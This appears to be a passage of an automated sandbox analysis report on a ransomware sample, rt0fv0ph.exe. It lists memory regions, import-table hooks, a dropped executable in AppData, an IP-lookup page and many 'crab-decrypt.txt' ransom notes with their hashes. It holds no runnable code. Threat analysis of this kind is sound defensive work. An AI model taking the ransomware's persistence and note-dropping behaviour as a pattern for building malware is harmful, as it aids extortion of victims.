private_0x00000000005d0000 0x005d0000 0x005dffff Private Memory Readable, Writable True False False -
private_0x00000000005e0000 0x005e0000 0x006dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00867fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000870000 0x00870000 0x009f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a00000 0x00a00000 0x01dfffff Pagefile Backed Memory Readable True False False -
private_0x0000000001e00000 0x01e00000 0x01efffff Private Memory Readable, Writable True False False -
private_0x0000000001f00000 0x01f00000 0x01ffffff Private Memory Readable, Writable True False False -
private_0x0000000002000000 0x02000000 0x020fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02100000 0x023cefff Memory Mapped File Readable False False False -
pagefile_0x00000000023d0000 0x023d0000 0x027c2fff Pagefile Backed Memory Readable True False False -
private_0x00000000027d0000 0x027d0000 0x0286ffff Private Memory Readable, Writable True False False -
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False -
private_0x0000000002830000 0x02830000 0x0286ffff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x02a8ffff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x0296ffff Private Memory Readable, Writable True False False -
private_0x0000000002970000 0x02970000 0x029affff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x02a2ffff Private Memory Readable, Writable True False False -
private_0x0000000002a50000 0x02a50000 0x02a8ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02c8ffff Private Memory Readable, Writable True False False -
private_0x0000000002c90000 0x02c90000 0x02dbffff Private Memory Readable, Writable True False False -
private_0x0000000002c90000 0x02c90000 0x02d8ffff Private Memory Readable, Writable True False False -
private_0x0000000002db0000 0x02db0000 0x02dbffff Private Memory Readable, Writable True False False -
private_0x0000000002dc0000 0x02dc0000 0x02eeffff Private Memory Readable, Writable True False False -
private_0x0000000002dc0000 0x02dc0000 0x02ebffff Private Memory Readable, Writable True False False -
private_0x0000000002ee0000 0x02ee0000 0x02eeffff Private Memory Readable, Writable True False False -
pidor.bmp 0x03f40000 0x04431fff Memory Mapped File Readable True True False
...
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x74540000 0x74542fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74710000 0x74715fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74720000 0x74771fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x74980000 0x74a3efff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74a40000 0x74a4ffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74a50000 0x74a55fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74a60000 0x74a6cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74a70000 0x74a84fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a90000 0x74a96fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74aa0000 0x74abbfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74ac0000 0x74b03fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x770a0000 0x770a2fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000005e0000:+0x18094 6. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetProcessAffinityMask+0x0 now points to private_0x000000007fff0000:+0x5d7fffc
...
IAT private_0x00000000005e0000:+0x18094 7. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FatalExit+0x0 now points to private_0x000000007fff0000:+0xb2474c0
...
IAT private_0x00000000005e0000:+0x18094 8. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetModuleHandleA+0x0 now points to private_0x000000007fff0000:+0x4086fc45
...
IAT private_0x00000000005e0000:+0x18094 9. entry of rt0fv0ph.exe 4 bytes kernel32.dll:OpenProcess+0x0 now points to private_0x00000000005e0000:+0xc1c74
...
IAT private_0x00000000005e0000:+0x18094 12. entry of rt0fv0ph.exe 4 bytes kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0x78468d00
...
IAT private_0x00000000005e0000:+0x18094 13. entry of rt0fv0ph.exe 4 bytes kernel32.dll:AddAtomA+0x0 now points to pagefile_0x0000000000a00000:+0x5c45c7
...
IAT private_0x00000000005e0000:+0x18094 17. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to rt0fv0ph.exe:+0xe120
...
IAT private_0x00000000005e0000:+0x18094 22. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetThreadPriorityBoost+0x0 now points to private_0x000000007fff0000:+0x71216800
...
IAT private_0x00000000005e0000:+0x18094 25. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetProcessWorkingSetSize+0x0 now points to private_0x000000007fff0000:+0x5b86d6ff
...
IAT private_0x00000000005e0000:+0x18094 26. entry of rt0fv0ph.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x00000000005e0000:+0xc1a74
...
IAT private_0x00000000005e0000:+0x18094 27. entry of rt0fv0ph.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x47f9458d
...
IAT private_0x00000000005e0000:+0x18094 28. entry of rt0fv0ph.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x0000000000050000:+0x3f845
...
IAT private_0x00000000005e0000:+0x18094 30. entry of rt0fv0ph.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x94a6a08
...
IAT private_0x00000000005e0000:+0x18094 32. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to rt0fv0ph.exe:+0xe168
...
IAT private_0x00000000005e0000:+0x18094 33. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to private_0x000000007fff0000:+0xb605b5e
...
IAT private_0x00000000005e0000:+0x18094 34. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlInitializeSListHead+0x0 now points to private_0x000000007fff0000:+0x4cc45de5
...
IAT private_0x00000000005e0000:+0x18094 35. entry of rt0fv0ph.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
...
IAT private_0x00000000005e0000:+0x18094 36. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetStartupInfoW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
...
IAT private_0x00000000005e0000:+0x18094 37. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x1ed8b55
...
IAT private_0x00000000005e0000:+0x18094 38. entry of rt0fv0ph.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x0000000000090000:+0x310ec
...
IAT private_0x00000000005e0000:+0x18094 40. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x45340041
...
IAT private_0x00000000005e0000:+0x18094 41. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x3fd4589
...
IAT private_0x00000000005e0000:+0x18094 43. entry of rt0fv0ph.exe 4 bytes kernel32.dll:TlsAlloc+0x0 now points to private_0x000000007fff0000:+0x4100000
...
IAT private_0x00000000005e0000:+0x18094 45. entry of rt0fv0ph.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007f0e0000:+0xde3d83
...
IAT private_0x00000000005e0000:+0x18094 47. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FreeLibrary+0x0 now points to apisetschema.dll:+0x984
...
IAT private_0x00000000005e0000:+0x18094 49. entry of rt0fv0ph.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x47016100
...
IAT private_0x00000000005e0000:+0x18094 50. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetModuleHandleExW+0x0 now points to private_0x000000007fff0000:+0x7ff4f085
...
IAT private_0x00000000005e0000:+0x18094 52. entry of rt0fv0ph.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x00000000005e0000:+0x6b900
...
IAT private_0x00000000005e0000:+0x18094 53. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x5c80000
...
IAT private_0x00000000005e0000:+0x18094 54. entry of rt0fv0ph.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x8000f3fc
...
IAT private_0x00000000005e0000:+0x18094 56. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x782dbd8d
...
IAT private_0x00000000005e0000:+0x18094 57. entry of rt0fv0ph.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x5c8ffff
...
IAT private_0x00000000005e0000:+0x18094 58. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x8000f400
...
IAT private_0x00000000005e0000:+0x18094 60. entry of rt0fv0ph.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x4034abf3
...
IAT private_0x00000000005e0000:+0x18094 62. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FindClose+0x0 now points to private_0x000000007fff0000:+0x9fb4589
...
IAT private_0x00000000005e0000:+0x18094 63. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FindFirstFileExW+0x0 now points to private_0x000000007fff0000:+0x7ff4f485
...
IAT private_0x00000000005e0000:+0x18094 64. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FindNextFileW+0x0 now points to private_0x000000007fff0000:+0x6141a1ff
...
IAT private_0x00000000005e0000:+0x18094 65. entry of rt0fv0ph.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x58a0040
...
IAT private_0x00000000005e0000:+0x18094 66. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x8000f3f8
...
IAT private_0x00000000005e0000:+0x18094 69. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to private_0x000000007fff0000:+0xe00fff4
...
IAT private_0x00000000005e0000:+0x18094 70. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7ff4f085
...
IAT private_0x00000000005e0000:+0x18094 72. entry of rt0fv0ph.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x7409857f
...
IAT private_0x00000000005e0000:+0x18094 73. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x5c8ffff
...
IAT private_0x00000000005e0000:+0x18094 74. entry of rt0fv0ph.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x8000f418
...
IAT private_0x00000000005e0000:+0x18094 75. entry of rt0fv0ph.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to rt0fv0ph.exe:+0x11d70
...
IAT private_0x00000000005e0000:+0x18094 76. entry of rt0fv0ph.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x741d85c7
...
IAT private_0x00000000005e0000:+0x18094 79. entry of rt0fv0ph.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to rt0fv0ph.exe:+0xe144
...
IAT private_0x00000000005e0000:+0x18094 84. entry of rt0fv0ph.exe 4 bytes user32.dll:EnableScrollBar+0x0 now points to private_0x000000007fff0000:+0x658cffff
...
IAT private_0x00000000005e0000:+0x18094 85. entry of rt0fv0ph.exe 4 bytes user32.dll:ReleaseDC+0x0 now points to private_0x00000000005e0000:+0xac35d
...
IAT private_0x00000000005e0000:+0x18094 86. entry of rt0fv0ph.exe 4 bytes user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd010004
...
IAT private_0x00000000005e0000:+0x18094 87. entry of rt0fv0ph.exe 4 bytes user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x7ff52c85
...
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\nhkaro.exe 267.01 KB MD5: dea1a9a92b6b52cd4aeacbee051fffea
SHA1: 685146792882423413bd12f4b290a854fabd0c02
SHA256: a23de23af853021f04620acf6b2e990b93528d86f0ce3ba0e5e07868dc8bbd64 		False
...
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ipv4bot_whatismyipaddress_com[1].htm 0.01 KB MD5: 7babbac56080f95db4d518527b38088f
SHA1: 75a1ee9d64cdf7f005fee26e63ca788a6b5b953a
SHA256: 3b8e4f16db9c55b8ee7a2ebbded76e4d4eadfdc4618642261a29fad8b98594d4 		False
...
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\loowgeai[1].htm 0.44 KB MD5: ccb13a747a33a40160c28845f072cb7d
SHA1: 6e7203a29f19da3e8f6c364e946b181201a8d0cc
SHA256: 8a9ed3a76391cb04c15dfa81b4d3ffad63f70a49a2c39207ac61ba0d97b802ec 		False
...
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eigeeyde[1].txt 0.54 KB MD5: 0dc567628795af3a7e76b1a91648f4ec
SHA1: 8f2be052f3539e00cfedca7b8258c2f7843d4ad4
SHA256: 0b35318ed6221dee7913cb1959271e2f80b8ccb81e21632da2c5a25de02ca817 		False
...
c:\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\$recycle.bin\s-1-5-21-2345716840-1148442690-1481144037-1000\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\perflogs\admin\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\program files\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\recovery\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\system volume information\spp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\system volume information\spp\onlinemetadatacache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\collab\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\forms\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\javascripts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\linguistics\dictionaries\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\identities\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\identities\{31810c36-5d23-4cce-a3b4-316ded195c38}\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
